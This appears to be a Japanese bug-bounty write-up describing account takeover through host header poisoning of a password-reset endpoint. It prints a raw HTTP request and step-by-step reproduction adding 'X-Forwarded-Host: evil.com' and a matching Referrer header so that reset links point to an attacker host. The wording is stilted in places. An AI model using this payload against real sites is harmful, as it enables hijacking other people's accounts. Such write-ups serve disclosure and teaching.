Hello there, ('ω')ノ
ホストヘッダポイズニングによるATOを。
脆弱性:
ホストヘッダインジェクション
アカウントの乗っ取り
パスワードリセットの欠陥
記事:
https://sechunter.medium.com/ato-via-host-header-poisoning-dc5c29d2fd0d
今回は、ホストヘッダポイズニングによるアカウント乗っ取りのバグについて。
Redacted.comは、リモートの攻撃者がそれを悪用して。
redacted.comのアカウントを乗っ取ることができる。
ホストヘッダインジェクションに対して脆弱で。
攻撃シナリオ:
攻撃者として、最初にHostヘッダの値をevil.comに変更するPOSTリクエストを。
変更しましたものの何も起こらず。
次に、evil.com値を持つX-Forwarded-Hostヘッダを追加しても何も起こらず。
次にReferrerヘッダの値も変更し。
X-Forwarded-Hostヘッダの値と同じ値を設定すると機能して。
リクエストは次のようになって。
POST /forgot HTTP/1.1
Host: redacted.com
X-Forwarded-Host: evil.com
Referrer: https://evil.com
username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e
リクエストを送信した後、evil.comは次のようになって。
悪意のあるホストとの電子メールを受け取って。
複製するステップ:
1.「https://redacted.com/forgot」に移動して。
2.ユーザ名を入力し、Burp Suiteを使用してそのリクエストを傍受して。
3.2つのヘッダをPOSTリクエストに追加して。
X-Forwarded-Host: evil.com
Referrer: https://evil.com
4.そのリクエストを転送して。
ユーザ名にリンクされている電子メールを確認して。
Best regards, (^^ゞ